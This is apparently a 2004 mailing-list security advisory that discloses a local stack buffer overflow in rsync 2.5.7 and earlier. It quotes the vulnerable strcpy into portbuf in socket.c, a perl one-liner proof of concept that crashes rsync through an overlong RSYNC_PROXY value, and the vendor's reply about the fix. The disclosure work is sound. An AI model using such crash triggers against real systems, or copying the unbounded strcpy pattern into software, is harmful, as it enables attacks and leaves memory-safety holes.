('binary' encoding is not supported, stored as-is)
Hi,
There is a local buffer overflow in rsync <= 2.5.7.
Problem is in open_socket_out function (socket.c).
Attacker can overflow portbuf[10] buffer on stack and overwrite saved return
address.
Rsync isn't suid so, no root shell today :-).
PoC example:
[root_at_localhost rsync-2.5.7]# export RSYNC_PROXY=`perl -e 'print "A" x
100,":","A" x 1000'`
[root_at_localhost rsync-2.5.7]# rsync localhost::
rsync: getaddrinfo:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA: ai_family not supported
Segmentation fault
[root_at_localhost rsync-2.5.7]#
- socket.c
...
char portbuf[10];
char *h;
int proxied = 0;
char buffer[1024];
char *cp;
h = getenv("RSYNC_PROXY");
proxied = (h != NULL) && (*h != '\0');
if (proxied) {
strlcpy(buffer, h, sizeof(buffer));
cp = strchr(buffer, ':');
if (cp == NULL) {
rprintf(FERROR,
"invalid proxy specification: should be
HOST:PORT\n");
return -1;
}
*cp++ = '\0';
strcpy(portbuf, cp); // <- OVERFLOW
...
Vendor response:
"Correct. I fixed this in the CVS version earlier this year. Since the proxy
data is coming from the local environment, I don't see a need to roll out an
update to 2.6.0 (which is the latest released version, BTW).
The fix will be in 2.6.1, which should be released in the next month or two."
DownBload / Illegal Instruction Labs
http://www.ii-labs.org
e-mail:downbload[at]hotmail.com
"Born under the lucky star magical,
but on this earth generally tragical."
Received on Feb 09 2004
Intro
